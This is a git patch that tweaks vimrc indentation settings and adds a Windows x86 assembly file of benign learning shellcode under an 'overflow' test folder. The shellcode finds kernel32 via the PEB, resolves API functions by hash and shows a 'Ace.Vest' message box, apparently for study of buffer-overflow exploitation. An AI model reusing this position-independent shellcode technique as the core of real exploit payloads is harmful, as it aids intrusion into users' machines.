From 5f0de55663ff1c3329de0b824fc3c7ea9f35400d Mon Sep 17 00:00:00 2001 From: AceVest Date: Sun, 24 Jul 2016 17:41:02 +0800 Subject: [PATCH] add shellcode --- learn/doc/vimrc | 13 ++-- learn/test/overflow/cof.asm | 115 ++++++++++++++++++++++++++++++++++++ 2 files changed, 124 insertions(+), 4 deletions(-) create mode 100644 learn/test/overflow/cof.asm diff --git a/learn/doc/vimrc b/learn/doc/vimrc index a298c7e..851a41e 100644 --- a/learn/doc/vimrc +++ b/learn/doc/vimrc @@ -101,9 +101,14 @@ set nobomb " "autocmd FileType php,python,c,java,perl,shell,bash,vim,ruby,cpp set sts=4 "golang默认使用TAB -autocmd FileType go set ai -autocmd FileType go set tabstop=4 -autocmd FileType go set shiftwidth=4 -autocmd FileType go set noexpandtab +"autocmd FileType go set ai +"autocmd FileType go set tabstop=4 +"autocmd FileType go set shiftwidth=4 +"autocmd FileType go set noexpandtab + +autocmd FileType asm set ai +autocmd FileType asm set tabstop=4 +autocmd FileType asm set shiftwidth=4 +autocmd FileType asm set expandtab imap jj " 连续按两次jj表示按ESC,进入命令模式 diff --git a/learn/test/overflow/cof.asm b/learn/test/overflow/cof.asm new file mode 100644 index 0000000..65b8932 --- /dev/null +++ b/learn/test/overflow/cof.asm @@ -0,0 +1,115 @@ +_main: + ;INT3 + CLD + + PUSH 0xFFFFFFFF + PUSH 0x1E380A6A ; hash of MessageBoxA + PUSH 0x4FD18963 ; hash of ExitProcess + PUSH 0x0C917432 ; hash of LoadLibraryA + + + XOR EAX, EAX + XOR EDI, EDI + MOV EAX, [FS:EAX + 0x30] ; PEB = TEB + 0x30 + MOV EAX, [EAX + 0x0C] ; PEB_LDR_DATA + MOV EAX, [EAX + 0x1C] ; InInitializationOrderModuleList + MOV EAX, [EAX] ; Module Kernel32.dll; next 指针在首4字节 + MOV EBP, [EAX + 0x08] ; BaseAddr of Kernel32.dll + +load_next_func_hash: + POP EBX + + CMP EBX, 0xFFFFFFFF + JE load_func_finish + + CMP EBX, 0x1E380A6A + JNE skip_load_library + + PUSH 0x3233 ; '\0\023' + PUSH 0x72657375 ; 'resu' + PUSH ESP + LEA EAX, [ESP + 0x10] + MOV EAX, [EAX] + CALL EAX + ADD ESP, 8 + + + XCHG EAX, EBP ; EBP -> user32.dll BaseAddr + +skip_load_library: + PUSHAD + + MOV ECX, [EBP + 0x3C] ; Offset of PE Header + ADD ECX, EBP ; Address of PE Header + + MOV ECX, [ECX + 0x78] ; Offset of Export Table + ADD ECX, EBP ; Address of Export Table + + + MOV EDI, -1 + +compare_next_func: + + INC EDI + + MOV ESI, [ECX + 0x20] ; Offset of Names Table + ADD ESI, EBP ; Address of Names Table + + MOV ESI, [ESI + EDI*4] ; Offset of Function Name + ADD ESI, EBP ; Address of Function Name + + CDQ + +get_func_hash: + MOVSX EAX, BYTE [ESI] + CMP AL, AH + JZ compare_hash + ROR EDX, 7 + ADD EDX, EAX + INC ESI + JMP get_func_hash + +compare_hash + CMP EDX, EBX + JNZ compare_next_func + + MOV ESI, [ECX + 0x24] ; Offset of Ordinal Table + ADD ESI, EBP ; Address of Ordinal Table + + XOR EAX, EAX + MOV AX, [ESI + 2*EDI] + MOV EDI, EAX + + + MOV ESI, [ECX + 0x1C] ; Offset of Address Table + ADD ESI, EBP ; Address of Address Table + + MOV EAX, [ESI + 4*EDI] + ADD EAX, EBP + + POP EDI + PUSH EAX + POPAD + LEA EAX, [ESP+0x0C] + MOV [EAX], EDI + + JMP load_next_func_hash + +load_func_finish: + ;INT3 + MOV EDI, ESP + + XOR EAX, EAX + PUSH EAX + PUSH 0x74736556 ; 'tseV' + PUSH 0x2E656341 ; '.ecA' + MOV EBX, ESP + PUSH EAX + PUSH EBX + PUSH EBX + PUSH EAX + CALL [EDI + 8] ; MessageBoxA('Ace.Vest') + + XOR EAX, EAX + PUSH EAX + CALL [EDI + 4] ; ExitProcess(0) -- 2.44.0